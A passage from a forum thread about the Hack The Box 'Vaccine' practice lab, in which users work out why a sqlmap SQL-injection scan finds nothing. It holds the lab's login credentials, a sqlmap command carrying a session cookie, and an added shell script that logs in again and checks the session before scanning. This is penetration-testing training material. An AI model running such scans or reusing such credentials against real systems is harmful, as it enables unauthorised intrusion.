Starting Point - Vaccine help

I’m making my way through the starting point machines and I’ve gotten stuck on the sqlmap section.

Looking at the walkthrough, there are cars listed in the catalogue, whereas mine is blank

When trying to use sqlmap with my PHPSESSID using the below command

sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7qppotvj5cf7im1r47871dvpu"

It says that all of the tested parameters do not appear to be injectable

Any suggestions would be much appreciated.

I’ve never done this machine so I might be missing a lot.

However, have you checked the user account you used to log in with? It looks like it has given you different access permissions.

@TazWake said:

I’ve never done this machine so I might be missing a lot.

However, have you checked the user account you used to log in with? It looks like it has given you different access permissions.

Yeah, I logged in to the webapp using the credentials recovered from backup.zip and used the PHPSESSID from that session.

Everything is telling me that it should work, but for some reason it isn’t.

Just to confirm - the creds are admin and qwerty789, is that correct?

If so, the box might be broken.

@TazWake said:

Just to confirm - the creds are admin and qwerty789, is that correct?

If so, the box might be broken.

Correct, those are the creds I’m using.

Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.

@1ntgr said:

Correct, those are the creds I’m using.

Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.

Unfortunately I don’t know - you might have to raise a Jira ticket with HTB and get them to fix it.

@TazWake said:

@1ntgr said:

Correct, those are the creds I’m using.

Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.

Unfortunately I don’t know - you might have to raise a Jira ticket with HTB and get them to fix it.

I’ll do that. Thanks for the help, much appreciated!

I’m having the same issue. I have raised a Jira ticket.
It looks to me like there is an issue with the PostgreSQL database, as the dashboard.php page is not populating with data from the database as shown in the walkthrough screenshots.

Also, if there is a database issue, the search field may not actually be passing user input to the database as a query, which would be a cause for sqlmap not finding any injection vulnerabilities, as it is effectively just a ‘dumb’ search box right now.

On the bright side, if you are not familiar with SQL databases and how web pages interact with them, this could be a nice opportunity to get a better understanding of what could be going wrong here.

I ran into the same issue today and solved it by deleting my session cookie, redoing the login on the website and redoing the sqlmap with the new session id. sqlmap then produced the expected output.

Before I deleted my session cookie I had the same issue that no entries showed up in the dashboard.
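Added example (not code from the thread, HTB or any of the posters) tying together the two points above: a blank dashboard means the search box never reaches the database, so a "not injectable" verdict says nothing, and a fresh login fixes a stale session. The script re-logs in with a clean cookie jar, extracts the new PHPSESSID and counts catalogue rows on dashboard.php before the session is trusted. The login endpoint `login.php`, the form fields `username`/`password` and the "one header row plus one `<tr>` per car" layout are assumptions; the target address and creds are the ones from this thread.

```shell
#!/bin/sh
# Pre-flight check for the Vaccine box: confirm the session actually reaches
# the database (catalogue rows present on dashboard.php) before running
# sqlmap with it. A stale PHPSESSID that renders a blank page gives sqlmap
# nothing to test, so "not injectable" would be meaningless.
# ASSUMPTIONS (not from the thread): login form is login.php with fields
# username/password; catalogue rows are <tr> elements after one header row.
TARGET="${TARGET:-http://10.10.10.46}"
JAR="${JAR:-/tmp/vaccine.jar}"

# Pull the PHPSESSID value out of a Netscape-format cookie jar (curl -c).
session_from_jar() {
  awk '!/^#/ && $6 == "PHPSESSID" { print $7 }' "$1" | tail -n 1
}

# Read dashboard HTML on stdin and print the number of data rows
# (all <tr> minus the header). 0 means the catalogue is blank.
dashboard_rows() {
  grep -o '<tr' | wc -l | awk '{ r = $1 - 1; if (r < 0) r = 0; print r }'
}

# Discard any old session, log in again and print the new session id.
fresh_login() {
  rm -f "$JAR"
  curl -s -c "$JAR" -b "$JAR" -o /dev/null \
       -d "username=$1&password=$2" "$TARGET/login.php"
  session_from_jar "$JAR"
}

if [ "${1:-}" = "run" ]; then
  sid=$(fresh_login admin qwerty789)
  [ -n "$sid" ] || { echo "login did not set PHPSESSID" >&2; exit 1; }
  rows=$(curl -s -b "PHPSESSID=$sid" "$TARGET/dashboard.php?search=a" | dashboard_rows)
  if [ "$rows" -eq 0 ]; then
    echo "dashboard still blank with a fresh session: box/DB likely broken, raise a ticket" >&2
    exit 1
  fi
  echo "session $sid returns $rows catalogue rows; re-run the sqlmap command with --cookie=\"PHPSESSID=$sid\""
fi
```

Run it as `sh check_session.sh run` on the lab VPN; without the `run` argument it only defines the functions.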